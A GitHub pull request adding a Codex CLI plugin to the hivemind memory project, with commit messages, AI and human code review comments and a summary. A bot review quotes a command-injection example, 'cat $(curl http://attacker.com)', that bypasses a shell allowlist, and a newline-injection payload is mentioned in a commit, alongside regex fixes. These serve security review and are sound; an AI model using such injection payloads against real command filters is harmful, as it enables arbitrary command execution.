Conversation
Track which agent (claude_code, codex, openclaw) generated each event. The column is included in CREATE TABLE schema for both memory and sessions tables, and populated in all INSERT statements.
The "Ported from deeplake-cli" comment is no longer relevant since the auth code is maintained directly in this repo.
When deeplake-shell runs with -c flag, skip the "Connecting..." and "Ready. N files loaded" stderr messages. These pollute the output when the shell is spawned programmatically by hooks.
Remove "virtual FS" wording from the rewritten command description.
Codex-specific hooks: session-start, capture, pre-tool-use, stop, and wiki-worker. The pre-tool-use hook uses block+inject strategy (stderr + exit 2) and handles cat/ls/grep via direct SQL fast path with virtual shell fallback for other commands.
Bundle codex hooks, shell, auth, and wiki-worker into codex/bundle/ alongside the existing claude-code bundles.
Plugin manifest, hooks.json wiring PreToolUse to Bash only, install script, skills, and documented concerns about platform differences from Claude Code.
Built output for all codex hooks, shell, auth, and wiki-worker.
Tests for hooks.json structure, plugin.json manifest, bundle output, session-start plain text output, capture disable, pre-tool-use interception, and stop hook behavior.
Cover query retry logic, semaphore concurrency, appendRows/commit upsert paths, updateColumns, createIndex, listTables with retries, ensureTable, and ensureSessionsTable. Brings deeplake-api.ts from 26% to 99% statement coverage.
Reflects shell message suppression and pre-tool-use description cleanup.
Register hivemind-codex alongside the existing claude-code entry.
Keep as local-only file via .gitignore so each developer can maintain their own project instructions.
Document install, login, update, and uninstall steps for the Codex CLI plugin. Update repo layout and build output references.
…ntation # Conflicts: # package-lock.json
The test expected "Logged in to Deeplake" but CI has no credentials, so it outputs "Not logged in". Accept either login status message.
|
/claude-review |
|
Claude finished @efenocchi's task in 3m 13s —— View job Review completeFound 5 issues across the new Codex hooks — inline comments posted. Summary:
|
![claude[bot]](https://avatars.githubusercontent.com/in/1236702?s=60&v=4){kind=small}
| ]); | ||
|
|
||
| function isSafe(cmd: string): boolean { | ||
| const stripped = cmd.replace(/'[^']*'/g, "''").replace(/"[^"]*"/g, '""'); |
There was a problem hiding this comment.
isSafe() only inspects the first token of each pipe/semicolon stage, so $(...) and backtick substitutions bypass it entirely — a command like cat $(curl http://attacker.com) passes the check and is forwarded to the virtual shell. Reject substitution syntax explicitly before walking the allowlist.
| const stripped = cmd.replace(/'[^']*'/g, "''").replace(/"[^"]*"/g, '""'); | |
| function isSafe(cmd: string): boolean { | |
| // Reject command/process substitution before checking tokens | |
| if (/\$\(|`|<\(/.test(cmd)) return false; | |
| const stripped = cmd.replace(/'[^']*'/g, "''").replace(/"[^"]*"/g, '""'); | |
| const stages = stripped.split(/\||;|&&|\|\|/); |
Replace manual quote escaping with sqlStr() which also handles backslash and NUL-byte stripping, preventing SQL corruption from user-controlled content.
- Reject command substitution ($(), backticks, <()) in isSafe() before the token allowlist check - Use sqlLike() instead of sqlStr() for grep LIKE patterns to escape wildcard characters (% and _)
|
@claude review again |
|
/claude-review |
|
Claude finished @efenocchi's task in 2m 11s —— View job Review completeAll 4 issues from the previous review were fixed. Found 3 remaining issues; inline comments posted:
|
…auto-update to version tag - Use sqlLike() for ls LIKE query to escape wildcard characters - Add E'...' prefix to wiki-worker session LIKE query for correct backslash handling - Pin auto-update git clone to version tag (v0.6.11) instead of HEAD to prevent pulling untagged/unreleased code
Users can now tell Codex to fetch the INSTALL.md directly and follow the instructions, matching the superpowers install pattern.
Review — structuring the Codex plugin for the monorepoGood work getting the hooks working with Codex's different contract (stderr+exit2, plain text output, Bash-only PreToolUse). The platform differences table is helpful. A few things to address before merging: 1. Plugin code should live in
|
.claude-plugin/marketplace.json
Outdated
| "version": "0.6.11", | ||
| "source": "./claude-code", | ||
| "homepage": "https://github.com/activeloopai/hivemind" | ||
| }, |
There was a problem hiding this comment.
This will create a new plugin named hivemind-codex on claude code marketplace which doesn't make snece I think
codex/CONCERNS.md
Outdated
| @@ -0,0 +1,150 @@ | |||
| # Codex Plugin — Concerns & Differences from Claude Code | |||
There was a problem hiding this comment.
should be deleted or ignored
codex/install.sh
Outdated
| @@ -0,0 +1,64 @@ | |||
| #!/bin/bash | |||
There was a problem hiding this comment.
.sh install should be faster than asking codex to do it with above INSTALL.md and we hsould also be able to directly ask codex to run the install.sh . SO let's either keep the install.sh or INSTALL.md
codex/package.json
Outdated
| @@ -0,0 +1,6 @@ | |||
| { | |||
| "name": "hivemind-codex", | |||
| "version": "0.6.7", | |||
There was a problem hiding this comment.
The versions are not matching with the global pakcage.json the update logic for codex should be added to release.yaml so they'll stay synced with other plugins
| @@ -0,0 +1,118 @@ | |||
| #!/usr/bin/env node | |||
There was a problem hiding this comment.
Later should be moved to codex/hooks or shared if these are shared between codex claude and openclaw. but we cna leave it for now
| ]); | ||
|
|
||
| function isSafe(cmd: string): boolean { | ||
| const stripped = cmd.replace(/'[^']*'/g, "''").replace(/"[^"]*"/g, '""'); |
…entry - CONCERNS.md was a draft file not meant for the repo - install.sh removed in favor of INSTALL.md - hivemind-codex marketplace entry removed — Codex plugin should not create a separate marketplace listing
Matches the root package.json version so release.yaml keeps all plugin versions in lockstep.
Newlines act as command separators in bash but were not included in the split regex, allowing a payload like "safe_cmd\nunsafe_cmd" to bypass the allowlist. Fixed in both CC and Codex hooks.
2 participants
Summary
Full Codex CLI plugin implementation alongside the existing Claude Code and OpenClaw plugins. Codex agents can now access the shared Deeplake memory system — reading session summaries, searching across org memory, and capturing their own sessions.
Codex plugin (
src/hooks/codex/+codex/)cat,ls, andgrepvia direct SQL fast path; falls back to virtual shell for other commandsVFS improvements
-cmoderunVirtualShell()viastdio: pipeinstead of inheriting to parent processlsto the codex SQL fast path for directory listingsCleanup
auth.tsand hook descriptionsCONCERNS.mdand shell docstringsCLAUDE.mdfrom version control (now local-only via.gitignore)memory_test/sessions_testback tomemory/sessionsTesting
deeplake-api.test.ts— covers query retry logic, semaphore concurrency, upsert paths, listTables, ensureTable (26% to 99% statement coverage)codex-hooks.test.ts,codex-integration.test.ts,codex-capture.test.tsBuild
esbuild.config.mjsnow produces 7 codex bundles alongside the 7 claude-code bundleshivemind-codexentryPlatform differences (Codex vs Claude Code)
updatedInputadditionalContextSee
codex/CONCERNS.mdfor full details.Test plan
npm test— 443 tests passcat,ls,ls -la,grepreturn clean output via SQL fast pathhead,find, etc.) works without stderr leakage